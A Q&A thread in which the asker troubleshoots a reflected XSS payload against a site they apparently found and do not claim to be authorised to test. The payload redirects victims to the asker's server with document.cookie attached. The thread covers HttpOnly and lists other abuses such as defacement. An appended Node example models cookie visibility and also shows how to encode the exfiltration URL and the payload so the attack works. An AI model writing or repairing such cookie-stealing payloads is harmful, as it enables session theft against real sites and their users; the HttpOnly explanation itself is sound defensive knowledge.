
I just found a website with an XSS vulnerability. When I visit the following URL, a pop-up appears:

https://example.com/article/HALLOWEEN"><script>alert(1);</script>

I have a cookielogger.php on my server with this code, so that when I visit myserver.com/key.php, a line is added to myserver.com/log.txt like this:

IP: 15x.1xx.xxx.xx | PORT: 58554 | HOST:  | Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 | METHOD:  | REF:  | DATE: Friday 21st 2018f September 2018 07:34:25 PM | COOKIE:  

But when I modify my URL to the one below, the cookie is not logged to my server:

https://example.com/article/HALLOWEEN"><script language= "JavaScript">document.location="http://myserver.com/key.php?cookie=" + document.cookie;</script>
Anders
  • Are the cookies you want to fetch flagged `HttpOnly`? – Arminius Sep 21 '18 at 19:49
  • Without knowing the actual site I obviously can't test it, but you may want to look at the characters present in the second request that are not in the first. First off, the spaces and the unencoded '+' sign. I wouldn't be surprised if this was causing the server to truncate the request. – Angelo Schilling Sep 21 '18 at 19:52
  • *"Yes, it flagged httpOnly."* Then you can't read it via JavaScript, unless you can find somewhere on a page where it is printed. – Alexander O'Mara Sep 21 '18 at 20:08
  • @Alexander: so, what are the impacts of reflected XSS if the cookie is flagged HttpOnly? – Yosua Kristanto Sep 22 '18 at 02:00
  • @YosuaKristanto as far as stealing cookies, it's not effective anymore – multithr3at3d Sep 23 '18 at 16:33

1 Answer

If document.cookie is empty, it is likely these cookies are set with the HttpOnly flag. This means you cannot access the cookies through JavaScript.

You will have to resort to other methods in which reflected XSS may be abused, like open redirects, content injection, website defacing, et cetera.

Wouter
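The thread turns on two separate things: a browser hands `document.cookie` only the cookies that were set without the `HttpOnly` attribute, and a payload pasted raw into a URL (spaces, `+`, quotes) does not reach the server as typed. The following is an added example, not code from the question or the answer, written for Node rather than a browser. It models the `HttpOnly` rule from the `Set-Cookie` headers a response carries (the real check is to read those headers in a proxy or DevTools), and shows how the exfiltration URL and the reflected payload should have been percent-encoded. The hostnames, cookie names and responses are constructed for illustration.

```javascript
// Added example (not from the original post). Models which cookies a
// cookie-stealing XSS payload can actually see, and encodes the payload
// and the exfiltration URL correctly. All hostnames, cookie names and
// Set-Cookie values below are made up for illustration.

// Parse one Set-Cookie header value into name, value and the attributes
// that matter here. Attribute names are case-insensitive per RFC 6265.
function parseSetCookie(header) {
  const parts = header.split(';').map((p) => p.trim());
  const eq = parts[0].indexOf('=');
  const name = parts[0].slice(0, eq).trim();
  const value = parts[0].slice(eq + 1).trim();
  const attrs = new Set(
    parts.slice(1).map((p) => p.split('=')[0].trim().toLowerCase()),
  );
  return {
    name,
    value,
    httpOnly: attrs.has('httponly'),
    secure: attrs.has('secure'),
  };
}

// What document.cookie would return on the cookie's origin: every cookie
// set without HttpOnly, serialised as "name=value; name=value" the way
// browsers do. An HttpOnly session cookie is simply absent.
function visibleToScript(setCookieHeaders) {
  return setCookieHeaders
    .map(parseSetCookie)
    .filter((c) => !c.httpOnly)
    .map((c) => `${c.name}=${c.value}`)
    .join('; ');
}

// Build the URL the question's payload intended. encodeURIComponent keeps
// "=", ";" and spaces from being reinterpreted as query syntax.
function exfilUrl(collector, cookieString) {
  return `${collector}?cookie=${encodeURIComponent(cookieString)}`;
}

// Percent-encode a reflected payload for use in a URL path segment so the
// server receives the characters the attacker typed. Without this, the
// spaces and the unencoded "+" in the second URL from the question are
// exactly what a server or browser is likely to mangle.
function encodePayloadForPath(payload) {
  return encodeURIComponent(payload);
}

// Constructed sample responses: the same two cookies, with and without
// HttpOnly on the session cookie.
const responseWithHttpOnly = [
  'sessionid=abc123; Path=/; HttpOnly; Secure',
  'theme=dark; Path=/',
];
const responseWithoutHttpOnly = [
  'sessionid=abc123; Path=/',
  'theme=dark; Path=/',
];

// Hypothetical collector endpoint and the payload from the question.
const collector = 'http://myserver.example/key.php';
const rawPayload =
  'HALLOWEEN"><script>document.location="' + collector +
  '?cookie=" + document.cookie;</script>';

console.log('script sees (HttpOnly set):   ', JSON.stringify(visibleToScript(responseWithHttpOnly)));
console.log('script sees (no HttpOnly):    ', JSON.stringify(visibleToScript(responseWithoutHttpOnly)));
console.log('exfil URL a payload would hit:', exfilUrl(collector, visibleToScript(responseWithoutHttpOnly)));
console.log('encoded path payload:         ', encodePayloadForPath(rawPayload));
```

Run with `node`. With `HttpOnly` on `sessionid`, the script-visible cookie string is just `theme=dark`, which is why a logger on the attacker's side receives an empty or useless `cookie=` parameter even when the injection itself works; the fix on the defender's side is the first `Set-Cookie` line, and the attacker's remaining options are the ones the answer lists.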